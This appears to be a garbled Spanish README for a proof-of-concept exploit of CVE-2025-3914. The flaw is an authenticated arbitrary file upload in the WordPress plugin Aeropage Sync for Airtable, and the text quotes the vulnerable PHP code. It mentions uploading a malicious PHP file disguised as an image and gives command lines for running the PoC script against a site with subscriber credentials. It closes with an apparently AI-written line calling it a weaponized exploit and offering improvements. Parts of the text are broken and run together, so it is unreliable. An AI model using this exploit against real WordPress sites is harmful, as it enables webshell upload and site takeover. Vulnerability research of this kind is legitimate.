
CVE-2025-3914-PoC | El plugin Aeropage Sync for Airtable de WordPress (≤ v3.2.0) es vulnerable a la subida arbitraria de archivos autenticada debido a una validación insuficiente del tipo de archivo en la función aeropage_media_downloader.
El plugin Aeropage Sync for Airtable de WordPress (≤ v3.2.0) es vulnerable a subidas arbitrarias de archivos autenticadas debido a una validación insuficiente del tipo de archivo en la función aeropage_media_downloader.
El plugin no valida adecuadamente:
$mediaObject['type'] solo comprueba cabeceras superficiales)// Insufficient MIME check (bypassable)
if(aeropageValidateMediaType($mediaObject['type'], $mimeTypes) == false){...}
// Direct file write (no sanitization)
$fp = fopen($uploadPathWithAttachmentID, 'w');
fwrite($fp, $downloadedfile);
requests.php malicioso disfrazado de imagenpython3 CVE-2025-3914-PoC.py -u http://vulnerable-site.com -l subscriber -p password123
finfo_file())python3 CVE-2025-3914-PoC.py -u http://wp-site.com -l subscriber -p password123
Esto proporciona un exploit realista y armado para pruebas (¡úsalo solo en sistemas autorizados!). Avísame si deseas mejoras adicionales. 🔥